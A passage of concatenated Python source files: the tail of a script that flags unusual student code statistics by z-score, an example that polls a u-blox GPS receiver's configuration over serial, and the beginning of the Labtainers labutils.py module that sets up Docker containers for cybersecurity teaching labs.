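# and zScore(30, 20.0, 8.165) ~= 1.22. runAssignment() below sums the absolute
# z-scores across all statTypes for each student and flags totals at or above
# the threshold.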
class Stat():
def __init__(self, mean, deviation):
self.mean = mean
self.deviation = deviation
def getStats(students, assign, filename, helpers):
# gather students stats into an array
studentDict = {}
array = []
for student in students:
safeFilename = common.makeFilenameSafe(filename) + "stats.json"
path = helpers.getPreprocessedPath(student, assign.name, safeFilename)
        if path is not None:
json = io.readJSON(path)
studentDict[student] = json
array.append(json)
return (studentDict, array)
def runAssignment(students, assign, args, helpers):
helpers.printf("Processing assignment '{}' in parellel...\n".format(assign.name))
threshold = args["threshold"]
# clusters for this assignment
clusters = []
# for each specificied file
files = assign.args["files"]
for filename in files:
# get stats from JSON
(studentDict, array) = getStats(students, assign, filename, helpers)
# calculate the stats from all students
stats = {}
for stat in statTypes:
mean = getMean(array, stat)
deviation = getDeviation(array, mean, stat)
stats[stat] = Stat(mean, deviation)
# collect the sum of z-scores for each student
for student in students:
if student in studentDict:
data = studentDict[student]
total = 0.0
for stat in statTypes:
if stats[stat].deviation != 0.0:
total += abs(zScore(data[stat], stats[stat].mean, stats[stat].deviation))
if total >= threshold:
cluster = common.Cluster(False, filename, total)
member = common.Member(student, assign.name, helpers)
cluster.add(member)
clusters.append(cluster)
    # save the clusters, ordered by descending score (key/reverse works on both
    # Python 2 and 3, unlike passing a bare comparison function)
    clusters.sort(key=lambda cluster: cluster.score, reverse=True)
results = []
for cluster in clusters:
results.append(cluster.toJSON())
json = io.getJSONString(results, True)
helpers.writeToPostprocessed(json, assign.name, "obfuscation_results.json")
# all done
helpers.printf("Finished '{}'!\n".format(assign.name))
def run(students, assignments, args, helpers):
threads = []
# for each assignment
for assign in assignments:
t = Process(target=runAssignment, args=(students, assign, args, helpers))
threads.append(t)
t.start()
# wait for all to finish
for t in threads:
t.join()
# all done!
return True
|
ubxstreamer.py
|
"""
Example implementation of a threaded UBXMessage streamer
Connects to the receiver's serial port and sets up a
threaded UBXReader process. With the reader process running
in the background, it polls the current PRT, USB, NMEA and MSG
configuration.
You should see the poll responses in the input stream,
or an ACK-NAK (Not Acknowledged) message if that
particular CFG-MSG type is not supported by the receiver.
Created on 2 Oct 2020
@author: semuadmin
"""
from io import BufferedReader
from threading import Thread
from time import sleep
from pyubx2 import UBXMessage, POLL, UBX_MSGIDS
from pyubx2.ubxreader import UBXReader
from serial import Serial, SerialException, SerialTimeoutException
import pyubx2.exceptions as ube
CFGMESSAGES = [
"CFG-ANT",
"CFG-BATCH",
"CFG-CFG",
"CFG-DAT",
"CFG-DGNSS",
"CFG-DOSC",
"CFG-DYNSEED",
"CFG-ESFALG",
"CFG-ESFA",
"CFG-ESFG",
"CFG-ESFWT",
"CFG-ESRC",
"CFG-FIXSEED",
"CFG-GEOFENCE",
"CFG-GNSS",
"CFG-HNR",
"CFG-INF",
"CFG-ITFM",
"CFG-LOGFILTER",
"CFG-MSG",
"CFG-NAV5",
"CFG-NAVX5",
"CFG-NMEA",
"CFG-ODO",
"CFG-PM2",
"CFG-PMS",
"CFG-PRT",
"CFG-PWR",
"CFG-RATE",
"CFG-RINV",
"CFG-RST",
"CFG-RXM",
"CFG-SBAS",
"CFG-SENIF",
"CFG-SLAS",
"CFG-SMGR",
"CFG-SPT",
"CFG-TMODE2",
"CFG-TMODE3",
"CFG-TP5",
"CFG-TXSLOT",
"CFG-USB",
]
class UBXStreamer:
"""
UBXStreamer class.
"""
def __init__(self, port, baudrate, timeout=5, ubx_only=False):
"""
Constructor.
"""
self._serial_object = None
self._serial_thread = None
self._ubxreader = None
self._connected = False
self._reading = False
self._port = port
self._baudrate = baudrate
self._timeout = timeout
self._ubx_only = ubx_only
def __del__(self):
"""
Destructor.
"""
self.stop_read_thread()
self.disconnect()
def connect(self):
"""
Open serial connection.
"""
self._connected = False
try:
self._serial_object = Serial(
self._port, self._baudrate, timeout=self._timeout
)
self._ubxreader = UBXReader(
BufferedReader(self._serial_object), ubxonly=self._ubx_only
)
self._connected = True
except (SerialException, SerialTimeoutException) as err:
print(f"Error connecting to serial port {err}")
return self._connected
def disconnect(self):
"""
Close serial connection.
"""
if self._connected and self._serial_object:
try:
self._serial_object.close()
except (SerialException, SerialTimeoutException) as err:
print(f"Error disconnecting from serial port {err}")
self._connected = False
return self._connected
def start_read_thread(self):
"""
Start the serial reader thread.
"""
if self._connected:
self._reading = True
self._serial_thread = Thread(target=self._read_thread, daemon=True)
self._serial_thread.start()
def stop_read_thread(self):
"""
Stop the serial reader thread.
"""
if self._serial_thread is not None:
self._reading = False
def send(self, data):
"""
Send data to serial connection.
"""
self._serial_object.write(data)
def flush(self):
"""
Flush input buffer
"""
self._serial_object.reset_input_buffer()
def waiting(self):
"""
Check if any messages remaining in the input buffer
"""
return self._serial_object.in_waiting
def _read_thread(self):
"""
THREADED PROCESS
Reads and parses UBX message data from stream
"""
while self._reading and self._serial_object:
if self._serial_object.in_waiting:
try:
(raw_data, parsed_data) = self._ubxreader.read()
# if raw_data:
# print(raw_data)
if parsed_data:
print(parsed_data)
except (
ube.UBXStreamError,
ube.UBXMessageError,
ube.UBXTypeError,
ube.UBXParseError,
) as err:
print(f"Something went wrong {err}")
continue
if __name__ == "__main__":
YES = ("Y", "y", "YES,", "yes", "True")
NO = ("N", "n", "NO,", "no", "False")
PAUSE = 1
print("Enter port: ", end="")
val = input().strip('"')
prt = val
print("Enter baud rate (9600): ", end="")
val = input().strip('"') or "9600"
baud = int(val)
print("Enter timeout (0.1): ", end="")
val = input().strip('"') or "0.1"
    timeout = float(val)
print("Do you want to ignore any non-UBX data (y/n)? (y) ", end="")
val = input() or "y"
ubxonly = val in NO
print("Instantiating UBXStreamer class...")
    ubp = UBXStreamer(prt, baud, timeout, ubxonly)
print(f"Connecting to serial port {prt} at {baud} baud...")
if ubp.connect():
print("Starting reader thread...")
ubp.start_read_thread()
print("\nPolling receiver configuration...\n")
# poll the receiver configuration
print("\nPolling port configuration CFG-PRT...\n")
        for port_id in (0, 1, 2, 3, 4):  # I2C, UART1, UART2, USB, SPI
            msg = UBXMessage("CFG", "CFG-PRT", POLL, portID=port_id)
ubp.send(msg.serialize())
sleep(PAUSE)
# poll all available CFG configuration messages
print("\nPolling CFG configuration CFG-*...\n")
for msgtype in CFGMESSAGES: # ("CFG-USB", "CFG-NMEA", "CFG-NAV5"):
msg = UBXMessage("CFG", msgtype, POLL)
ubp.send(msg.serialize())
sleep(PAUSE)
# poll a selection of current navigation message rates using CFG-MSG
print("\nPolling navigation message rates CFG-MSG...\n")
for msgid in UBX_MSGIDS:
if msgid[0] in (1, 240, 241): # NAV, NMEA-Standard, NMEA-Proprietary
msg = UBXMessage("CFG", "CFG-MSG", POLL, payload=msgid)
ubp.send(msg.serialize())
sleep(1)
print("\n\nPolling complete, waiting for final responses...\n\n")
sleep(PAUSE)
print("\n\nStopping reader thread...")
ubp.stop_read_thread()
print("Disconnecting from serial port...")
ubp.disconnect()
print("Test Complete")
|
labutils.py
|
'''
This software was created by United States Government employees at
The Center for Cybersecurity and Cyber Operations (C3O)
at the Naval Postgraduate School NPS. Please note that within the
United States, copyright protection is not available for any works
created by United States Government employees, pursuant to Title 17
United States Code Section 105. This software is in the public
domain and is not subject to copyright.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import filecmp
import glob
import json
import hashlib
from hashlib import md5
import os
import shutil
import re
import subprocess
import sys
import time
import zipfile
import ParseStartConfig
import ParseLabtainerConfig
import datetime
import getpass
import socket
import fcntl
import struct
import threading
import LabCount
import shlex
import stat
import traceback
import string
import errno
import registry
''' assumes relative file positions '''
here = os.path.dirname(os.path.abspath(__file__))
lab_bin_dir = os.path.join(here, '../lab_bin')
sys.path.append(lab_bin_dir)
import ParameterParser
import InspectLocalReg
import InspectRemoteReg
''' logger is defined in whatever script that invokes the labutils '''
global logger
# Error code returned by docker inspect
SUCCESS=0
FAILURE=1
'''
Version number embeded as a label into each docker image.
Current framework version (per below) must be at least
what is found in the image. This is only used for
framework/image compatibility, to tell a user that a given
lab cannot be run without doing an update.
'''
framework_version = 3
osTypeMap = {}
networkImages = []
# Create a directory path based on input path
# Note: Do not create if the input path already exists as a directory
# If input path is a file, remove the file then create directory
def createDirectoryPath(input_path):
# if it exist as a directory, do not delete (only delete if it is a file)
if os.path.exists(input_path):
# exists but is not a directory
if not os.path.isdir(input_path):
# remove file then create directory
os.remove(input_path)
os.makedirs(input_path)
#else:
# logger.debug("input_path directory (%s) exists" % input_path)
else:
# does not exists, create directory
os.makedirs(input_path)
def isValidLab(lab_path):
# Lab path must exist and must be a directory
if os.path.exists(lab_path) and os.path.isdir(lab_path):
# Assume it is valid lab then
logger.debug("lab_path directory (%s) exists" % lab_path)
else:
logger.error("Invalid lab! lab_path directory (%s) does not exist!" % lab_path)
#traceback.print_exc()
#traceback.print_stack()
sys.exit(1)
def getFirstUnassignedIface(n=1):
    ''' get the nth network interface that lacks an assigned IP address '''
    iflist = os.listdir('/sys/class/net')
    count = 1
    for iface in sorted(iflist):
        ip = get_ip_address(iface)
        if ip is None:
            if count == n:
                return iface
            count += 1
    return None
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sp = struct.pack('256s', str.encode(ifname[:15]))
try:
fc = fcntl.ioctl(s.fileno(), 0x8915, sp)
except:
return None
return socket.inet_ntoa(fc[20:24])
def get_hw_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if sys.version_info >=(3,0):
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(ifname, 'utf-8')[:15]))
return ':'.join('%02x' % b for b in info[18:24])
except:
return None
else:
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', str(ifname[:15])))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
except:
return None
def get_new_mac(ifname):
    ''' use the last two bytes of the mac address to generate a new mac,
        intended for use on macvlan '''
# TBD move this hardcoded prefix into some config file?
preface = '02:43:ac:12'
my_mac = get_hw_address(ifname)
parts = my_mac.split(':')
p1 = parts[4]
p2 = parts[5]
full = '%s:%s:%s' % (preface, p1, p2)
return full
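# Example of the mapping performed by get_new_mac() (addresses are
# illustrative): if get_hw_address(ifname) returns '08:00:27:a1:b2:c3', the
# last two bytes are kept and the result is '02:43:ac:12:b2:c3'.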
def isalphadashscore(name):
# check name - alphanumeric,dash,underscore
return re.match(r'^[a-zA-Z0-9_-]*$', name)
# get docker0 IP address
def getDocker0IPAddr():
#return get_ip_address('docker0')
cmd = "docker inspect -f '{{ .NetworkSettings.IPAddress }}' docker0"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) == 0:
''' is a docker0 master container '''
if len(output[0].strip()) > 0:
return output[0].decode('utf-8').strip()
else:
return None
else:
return get_ip_address('docker0')
# Parameterize my_container_name container
def ParameterizeMyContainer(mycontainer_name, mycontainer_image_name, container_user, container_password, lab_instance_seed,
user_email, labname, lab_path, name, image_info, running_container=None):
retval = True
if running_container == None:
running_container = mycontainer_name
''' copy lab_bin and lab_sys files into .local/bin and / respectively '''
CopyLabBin(running_container, mycontainer_image_name, container_user, lab_path, name, image_info)
cmd = 'docker exec %s script -q -c "chown -R %s:%s /home/%s"' % (mycontainer_name, container_user, container_user, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker exec %s script -q -c "chown root:root /usr"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd_path = '/home/%s/.local/bin/parameterize.sh' % (container_user)
if container_password == "":
container_password = container_user
version = '0'
if image_info is None or image_info.version is None:
''' is a build, version -1 '''
version = '-1'
else:
#print(str(image_info))
if image_info.version is not None:
version = image_info.version
display = os.getenv('DISPLAY')
command=['docker', 'exec', '-i', running_container, cmd_path, container_user, container_password, lab_instance_seed, user_email, labname, mycontainer_name, version, display ]
logger.debug("About to call parameterize.sh with : %s" % str(command))
#return retval
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8')
if len(error_string) > 0:
for line in error_string.splitlines(True):
if not line.startswith('[sudo]') and "LC_ALL" not in line and "ENCRYPT_METHOD" not in line:
logger.error('ParameterizeMyContainer %s' % line)
retval = False
else:
logger.debug(line)
out_string = child.stdout.read().decode('utf-8').strip()
if len(out_string) > 0:
logger.debug('ParameterizeMyContainer %s' % out_string)
if mycontainer_image_name in networkImages:
cmd = "docker exec %s bash -c 'mkdir -p /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed mkdir of /run/sshd')
exit(1)
cmd = "docker exec %s bash -c 'chmod 0755 /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed chmod of /run/sshd')
exit(1)
else:
pass
return retval
def DoCmd(cmd):
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = True
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
retval = False
if len(output[0]) > 0:
logger.debug(output[0].decode('utf-8'))
return retval
# Start my_container_name container
def StartMyContainer(mycontainer_name):
retval = True
if IsContainerRunning(mycontainer_name):
logger.error("Container %s is already running!\n" % (mycontainer_name))
sys.exit(1)
command = "docker start %s" % mycontainer_name
logger.debug("Command to execute is (%s)" % command)
if not DoCmd(command):
retval = False
return retval
def AllContainersCreated(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerCreated(clone_full):
return False
return True
# Check to see if my_container_name container has been created or not
def IsContainerCreated(mycontainer_name):
retval = True
command = "docker inspect -f {{.Created}} --type container %s" % mycontainer_name
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if result == FAILURE:
retval = False
logger.debug("Result of subprocess.call for %s IsContainerCreated is %s (1=>FAILURE)" % (mycontainer_name, result))
return retval
def GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name):
''' return the network address parameter and mac parameter for use in creating a container
or connecting the container to a network. Parse out mac address suffix if it exists,
and adjust the ip address based on clone numbers if the address has a "+CLONE" suffix '''
mac = ''
ip_param = ''
if ':' in mysubnet_ip:
mysubnet_ip, mac_addr = mysubnet_ip.split(':',1)
mac = '--mac-address=%s' % mac_addr
elif mysubnet_ip.lower() == 'auto_mac':
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
if not mysubnet_ip.lower().startswith('auto'):
if '+' in mysubnet_ip:
ip, clone_type = mysubnet_ip.split('+')
if clone_type.lower() == 'clone' or start_config.multi_user == 'clones':
name, role = mycontainer_name.rsplit('.',1)
dumb, offset = name.rsplit('-', 1)
try:
offset_int = int(offset)
except:
logger.error('expected use of clone, but did not find clone counter in %s' % mycontainer_name)
exit(1)
ip_start, ip_suffix = ip.rsplit('.', 1)
ip_suffix_int = int(ip_suffix)
new_suffix = ip_suffix_int + offset_int - 1
if new_suffix > 254:
logger.error('IP address adjusted to invalid value %d %s' % (new_suffix, mysubnet_ip))
exit(1)
ip_param = '--ip=%s.%d' % (ip_start, new_suffix)
elif clone_type.lower() == 'clone_mac' and start_config.multi_user == 'client':
# assuming we are a multiuser client
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
else:
print('ip %s' % ip)
ip_param = '--ip=%s' % ip
else:
ip_param = '--ip=%s' % mysubnet_ip
return ip_param, mac
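# Worked example of the '+CLONE' handling in GetNetParam() (names and addresses
# are hypothetical): with mysubnet_ip = '172.25.0.10+CLONE' and
# mycontainer_name = 'somelab.server-3.student', the clone offset parsed from
# the container name is 3, so the returned ip_param is '--ip=172.25.0.12'
# (suffix 10 + 3 - 1) and mac is left empty.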
def ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip):
logger.debug("Connecting more network subnet to container %s" % mycontainer_name)
ip_param, dumb = GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name)
command = "docker network connect %s %s %s" % (ip_param, mysubnet_name, mycontainer_name)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call ConnectNetworkToContainer is %s" % result)
return result
def DisconnectNetworkFromContainer(mycontainer_name, mysubnet_name):
logger.debug("Disconnecting more network subnet to container %s" % mycontainer_name)
command = "docker network disconnect %s %s" % (mysubnet_name, mycontainer_name)
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
result = 0
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
        result = 1
return result
def SetXhost():
''' allow container root users to access xserver '''
cmd = 'xhost'
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if not 'LOCAL:' in output[0].decode('utf-8'):
cmd = 'xhost local:root'
os.system(cmd)
def GetContainerCloneNames(container):
''' populate dictionary with hostname/container names based on the quantity of clones
that are to be created '''
retval = {}
if container.clone_copies is None or container.clone == 1:
retval[container.full_name] = container.hostname
else:
try:
count = int(container.clone_copies)
except:
logger.error('bad clone value for %s' % container.hostname)
exit(1)
name, role = container.full_name.rsplit('.', 1)
for i in range(1, count+1):
hostname = '%s-%d' % (container.hostname, i)
fullname = '%s-%d.%s' % (name, i, role)
retval[fullname] = hostname
return retval
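# Example of the naming scheme above (hypothetical values): a container with
# full_name 'somelab.server.student', hostname 'server' and clone_copies = 2
# (with cloning enabled) yields
#     {'somelab.server-1.student': 'server-1',
#      'somelab.server-2.student': 'server-2'}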
def GetDNS_NMCLI():
    dns_param = '--dns=8.8.8.8'
cmd="nmcli dev show | grep 'IP4.DNS'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[1].strip(), dns_param)
''' just take first '''
break
return dns_param
def GetDNS():
    dns_param = '--dns=8.8.8.8'
labtainer_dns = os.getenv('LABTAINER_DNS')
if labtainer_dns is not None and len(labtainer_dns)>0:
dns_param = '--dns=%s %s' % (labtainer_dns.strip(), dns_param)
else:
cmd="systemd-resolve --status | grep 'DNS Servers:'"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
for line in output[0].decode('utf-8').splitlines(True):
dns_param = '--dns=%s %s' % (line.split()[2].strip(), dns_param)
''' just take first '''
break
else:
dns_param = GetDNS_NMCLI()
return dns_param
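# The string returned by GetDNS() is spliced directly into the "docker create"
# command built in CreateSingleContainer(); a typical result (addresses are
# illustrative) is '--dns=192.168.1.1 --dns=8.8.8.8', i.e. the first resolver
# found on the host followed by the 8.8.8.8 fallback.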
def GetX11SSH():
''' EXPERIMENTAL, not used '''
ip = '192.168.1.222'
xauth = '/tmp/.docker.xauth'
#display = os.getenv('DISPLAY')
display = ':10'
cmd = 'xauth list %s' % display
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0]) > 0:
parts = output[0].decode('utf-8').strip().split()
magic_cookie = parts[2]
else:
print('could not find magic cookie')
exit(1)
x11_port = display.split(':')[1]
#print('x11_port %s' % x11_port)
cmd = 'xauth -f /tmp/.docker.xauth add %s:%s . %s' % (ip, x11_port, magic_cookie)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
os.chmod(xauth, 0o777)
retval = '--env="%s:%s" -v %s:%s -e XAUTHORITY="%s"' % (ip, x11_port, xauth, xauth, xauth)
#retval = '--env="DISPLAY" -v %s:%s -e XAUTHORITY="%s"' % (xauth, xauth, xauth)
return retval
def isUbuntuSystemd(image_name):
''' NOTE side effect of update networkImages global '''
done = False
retval = None
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
#logger.debug('isUbuntuSystemd base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]
if base.startswith('"'):
base = base[1:]
if '/' in base and '/' in image_name:
my_registry = image_name.split('/')[0]
no_reg = base.split('/')[1]
base = '%s/%s' % (my_registry, no_reg)
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'sshd' in line or 'xinetd' in line:
net_image = image_name
if '/' in image_name:
net_image = image_name.split('/')[1]
if net_image not in networkImages:
networkImages.append(net_image)
if 'Labtainer base image from ubuntu-systemd' in line:
retval = 'ubuntu16'
if 'ubuntu20' in line:
retval = 'ubuntu20'
break
return retval
def isFirefox(image_name):
done = False
retval = False
#print('check if %s is systemd' % image_name)
cmd = "docker inspect -f '{{json .Config.Labels.base}}' --type image %s" % image_name
#print('lab container cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[0].strip()) > 0:
logger.debug('base %s' % output[0].decode('utf-8'))
if output[0].decode('utf-8').strip() == 'null':
base = image_name
else:
base = output[0].decode('utf-8').rsplit('.', 1)[0]+'"'
cmd = "docker history --no-trunc %s" % base
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
for line in output[0].decode('utf-8').splitlines():
if 'firefox' in line:
retval = True
break
return retval
def FindTapMonitor(start_config):
for container_name in start_config.containers:
#logger.debug('FindTapMonitor check %s' % container_name)
for subnet in start_config.containers[container_name].container_nets:
#logger.debug('FindTapMonitor check lan %s' % subnet)
if subnet.lower() == 'tap_lan':
ip = start_config.containers[container_name].container_nets[subnet]
return container_name, ip
return None, None
def HandleVolumes(volume, container):
for m in container.mounts:
logger.debug('adding volume mount %s' % m)
''' host volume is relative to ~/.local/share/labtainers, container relative to Home unless absolute '''
try:
hostv, containerv = m.split(':')
except:
            logger.error('Bad mount definition %s' % m)
exit(1)
homedir = os.environ['HOME']
host_path = os.path.join(homedir, '.local', 'share', 'labtainers', hostv)
if not os.path.isfile(host_path):
try:
os.mkdir(host_path)
except:
pass
container_path = os.path.join('/home', container.user, containerv)
volume = volume + ' -v %s:%s:rw' % (host_path, container_path)
return volume
def CreateSingleContainer(labtainer_config, start_config, container, mysubnet_name=None, mysubnet_ip=None, quiet=False):
''' create a single container -- or all clones of that container per the start.config '''
retval = True
#image_exists, result, new_image_name = ImageExists(container.image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
logger.debug("Create Single Container for %s using registry %s" % (container.name, container_registry))
image_info = imageInfo(container.image_name, container_registry, base_registry, labtainer_config, quiet=quiet)
if image_info is None:
logger.error('Could not find image for %s' % container.image_name)
retval = False
else:
new_image_name = container.image_name
if not image_info.local_build:
new_image_name = '%s/%s' % (container_registry, container.image_name)
if not image_info.local:
dockerPull(container_registry, container.image_name)
docker0_IPAddr = getDocker0IPAddr()
logger.debug("getDockerIPAddr result (%s)" % docker0_IPAddr)
volume=''
ubuntu_systemd = isUbuntuSystemd(new_image_name)
if ubuntu_systemd is not None:
osTypeMap[container.image_name] = ubuntu_systemd
is_firefox = isFirefox(new_image_name)
if is_firefox:
shm = '--shm-size=2g'
else:
shm = ''
if container.script == '' or ubuntu_systemd is not None:
logger.debug('Container %s is systemd or has script empty <%s>' % (new_image_name, container.script))
''' a systemd container, centos or ubuntu? '''
if ubuntu_systemd == 'ubuntu16':
''' A one-off run to set some internal values. This is NOT what runs the lab container '''
#volume='--security-opt seccomp=confined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
volume='--security-opt seccomp=unconfined --tmpfs /run --tmpfs /run/lock -v /sys/fs/cgroup:/sys/fs/cgroup:ro'
cmd = 'docker run --rm --privileged -v /:/host %s setup' % new_image_name
logger.debug('cmd is %s' % cmd)
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug('back from docker run, output %s' % (output[0].decode('utf-8')))
if len(output[1]) > 0:
logger.debug('back from docker run, error %s' % (output[1].decode('utf-8')))
volume = ''
elif ubuntu_systemd == 'ubuntu20':
volume = volume + " -v /sys/fs/cgroup:/sys/fs/cgroup:ro "
if container.x11.lower() == 'yes':
#volume = '-e DISPLAY -v /tmp/.Xll-unix:/tmp/.X11-unix --net=host -v$HOME/.Xauthority:/home/developer/.Xauthority'
#volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/tmp/.X11-unix:rw"'
volume = volume+' --env="DISPLAY" --volume="/tmp/.X11-unix:/var/tmp/.X11-unix:rw"'
logger.debug('container using X11')
volume = HandleVolumes(volume, container)
if container.mystuff.lower() == 'yes':
here = os.getcwd()
mystuff_dir = os.path.join(here, 'mystuff')
myv = ' --volume="%s:/home/%s/mystuff:rw"' % (mystuff_dir, container.user)
volume = volume+myv
mystuff_dir = os.path.join(os.environ['LABTAINER_DIR'], 'scripts', 'labtainer-student','mystuff')
try:
os.mkdir(mystuff_dir)
except:
pass
#if container.thumb_volume is not None:
# volume = volume+' --volume="/dev:/dev:rw"'
# #volume = volume+' --device="/dev/sdb"'
add_hosts = ''
for item in container.add_hosts:
if ':' not in item:
if item in start_config.lan_hosts:
for entry in start_config.lan_hosts[item]:
if not entry.startswith(container.name):
add_this = '--add-host %s ' % entry
add_hosts += add_this
else:
logger.error('ADD-HOST entry in start.config missing colon: %s' % item)
                    logger.error('syntax: ADD-HOST <host>:<ip>')
return
else:
add_this = '--add-host %s ' % item
add_hosts += add_this
if docker0_IPAddr is not None:
add_host_param = '--add-host my_host:%s %s' % (docker0_IPAddr, add_hosts)
else:
add_host_param = add_hosts
if container.tap == 'yes':
''' Docker quirk when using host networking: sudo hangs trying to resolve the hostname, so map it to 127.0.0.1 '''
add_host_param = '--add-host %s:127.0.0.1 %s' % (container.hostname, add_host_param)
monitor_tap, ip = FindTapMonitor(start_config)
if monitor_tap is not None:
add_host_param = '--add-host monitor_tap:%s %s' % (ip, add_host_param)
wait_tap_dir = GetWaitTapDir()
volume = '%s --volume %s:/tmp/wait_tap_dir' % (volume, wait_tap_dir)
dns_param = GetDNS()
priv_param = ''
if container.no_privilege != 'yes':
priv_param = '--privileged'
publish_param = ''
if container.publish is not None:
publish_param = '--publish %s' % container.publish
mac = ''
subnet_ip = ''
network_param = ''
if container.tap == 'yes':
network_param = '--network=host'
elif mysubnet_name is not None:
network_param = '--network=%s' % mysubnet_name
multi_user = ''
if container.client == 'yes' and start_config.multi_user is not None:
#print('use putenv to set %s' % start_config.multi_user)
os.putenv("DISTRIBUTED_LABTAINER", start_config.multi_user)
''' why does putenv not set the value? '''
os.environ['DISTRIBUTED_LABTAINER'] = start_config.multi_user
multi_user = '--env=DISTRIBUTED_LABTAINER'
clone_names = GetContainerCloneNames(container)
for clone_fullname in clone_names:
clone_host = clone_names[clone_fullname]
if mysubnet_name is not None:
subnet_ip, mac = GetNetParam(start_config, mysubnet_name, mysubnet_ip, clone_fullname)
#createsinglecommand = "docker create -t %s --ipc host --cap-add NET_ADMIN %s %s %s %s %s --name=%s --hostname %s %s %s %s %s" % (dns_param,
if len(container.docker_args) == 0:
createsinglecommand = "docker create %s -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s" % \
(shm, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
publish_param, clone_fullname, clone_host, volume,
multi_user, new_image_name)
else:
createsinglecommand = "docker create %s %s --shm-size=2g -t %s --cap-add NET_ADMIN %s %s %s %s %s %s --name=%s --hostname %s %s %s %s" % \
(shm, container.docker_args, dns_param, network_param, subnet_ip, mac, priv_param, add_host_param,
